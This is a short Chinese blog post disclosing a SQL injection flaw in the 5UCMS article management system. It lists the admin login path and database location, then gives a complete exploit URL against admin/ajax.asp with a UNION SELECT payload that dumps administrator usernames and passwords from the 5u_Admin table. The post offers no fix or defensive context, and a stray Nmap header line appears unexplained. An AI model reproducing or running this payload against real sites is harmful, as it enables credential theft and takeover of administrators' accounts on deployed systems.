当前位置: iick's blog > 网站漏洞 > 无忧网络文章管理系统(5UCMS)注入漏洞

无忧网络文章管理系统(5UCMS)注入漏洞

作者:hack1990 时间:12-05-12 阅读数:680人阅读

 

后台地址:admin/Login.asp

数据库路径:inc/db  目录下

漏洞地址:

 
admin/ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20from 5u_Admin&id=1%20and%201=2%20UNION%20select%201%20from 5u_Admin
 
获取后台账号和密码

 

# Nmap Security Scanner 7.0

上一篇:咿呀咿呀淘客家族注入漏洞

下一篇:羊驼CMS sql injection & getShell

相关文章

发表评论